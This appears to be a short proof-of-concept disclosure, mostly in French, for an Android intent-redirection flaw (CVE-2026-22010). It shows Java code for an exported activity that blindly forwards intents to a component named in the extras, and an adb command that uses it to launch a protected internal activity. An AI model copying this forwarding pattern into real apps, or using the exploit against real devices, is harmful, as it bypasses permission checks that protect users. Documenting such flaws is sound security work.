
Preuve de concept pour la redirection d'intents Android CVE-2026-22010 : démontre une activité exportée transmettant des intents vers des composants internes contrôlés par l'attaquant, contournant les contrôles de permissions, avec un code Java vulnérable et des étapes d'exploitation via adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Une activité Android exportée redirige aveuglément les intents entrants vers un composant spécifié dans les extras de l'Intent. Un attaquant peut créer un Intent qui amène l'application à lancer une activité interne protégée avec des données contrôlées par l'attaquant, contournant ainsi les contrôles d'autorisation.
Déployez l'application vulnérable sur un émulateur Android. Envoyez un Intent via adb :
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
L'activité interne se lance sans les autorisations appropriées.